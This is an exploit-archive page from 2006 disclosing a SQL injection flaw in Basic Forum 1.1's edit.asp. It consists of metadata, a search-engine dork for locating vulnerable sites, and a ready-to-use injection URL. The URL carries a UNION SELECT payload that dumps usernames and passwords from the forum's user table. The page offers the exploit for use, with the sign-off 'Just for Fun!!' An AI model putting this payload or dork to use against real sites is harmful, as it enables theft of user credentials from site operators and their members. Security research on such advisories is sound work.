Basic Forum <= 1.1 (edit.asp) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Basic Forum <= 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Published : 2006-11-25
# Author : bolivar
# Previous Title : Sisfo Kampus <= 0.8 Remote File Inclusion / Download Vulnerabilities
# Next Title : ASP-Nuke Community <= 1.5 Cookie Privilege Escalation Vulnerability

# Title   :  basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "This script created by www.script.canavari.com"

---------------------------------------------------------------------------

http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler

---------------------------------------------------------------------------
# Just for Fun!!

# www.Syue.com [2006-11-25]